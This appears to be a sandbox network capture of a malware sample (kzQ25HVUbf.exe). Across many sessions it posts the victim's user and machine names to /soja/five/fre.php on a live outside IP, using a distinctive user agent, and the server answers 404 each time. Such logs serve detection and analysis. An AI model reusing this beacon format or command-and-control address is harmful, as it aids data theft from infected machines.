Jan 11, 2025 08:38:20.120965958 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:20.125881910 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:20.836322069 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.9	50050	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:21.370088100 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:21.374943972 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:22.072261095 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.9	50051	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:22.224869967 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:22.229790926 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:22.938649893 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.9	50052	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:23.083657980 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:23.088593006 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:23.775298119 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.9	50053	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:24.215934992 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:24.220880032 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:24.924638987 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.9	50054	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:25.068346977 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:25.073323011 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:25.792571068 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.9	50055	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:25.952918053 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:25.957719088 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:26.667535067 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.9	50056	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:26.967555046 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:26.972510099 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:27.818962097 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.9	50057	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:27.971338987 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:27.976207972 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:28.682303905 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.9	50058	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:28.832487106 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:28.837378979 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:29.679384947 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.9	50059	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:29.835344076 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:29.840821981 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:30.528879881 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.9	50060	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:30.688133001 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:30.693073034 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:31.418010950 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.9	50061	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:31.572173119 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:31.577126026 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:32.294554949 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.9	50062	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:32.455660105 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:32.460500956 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:33.203769922 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.9	50063	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:33.641577005 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:33.646502972 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:34.375179052 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.9	50064	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:34.525528908 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:34.530472040 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:35.360055923 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.9	50065	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:35.505433083 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:35.510278940 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:36.209681988 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.9	50066	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:36.465678930 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:36.471295118 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:37.179097891 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.9	50067	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:37.331305981 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:37.336378098 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:38.042653084 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.9	50068	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:38.197530031 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:38.202393055 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:38.911967993 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.9	50069	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:39.233977079 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:39.238877058 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:39.956676960 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.9	50070	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:40.125298977 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:40.130127907 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:40.858809948 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.9	50071	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
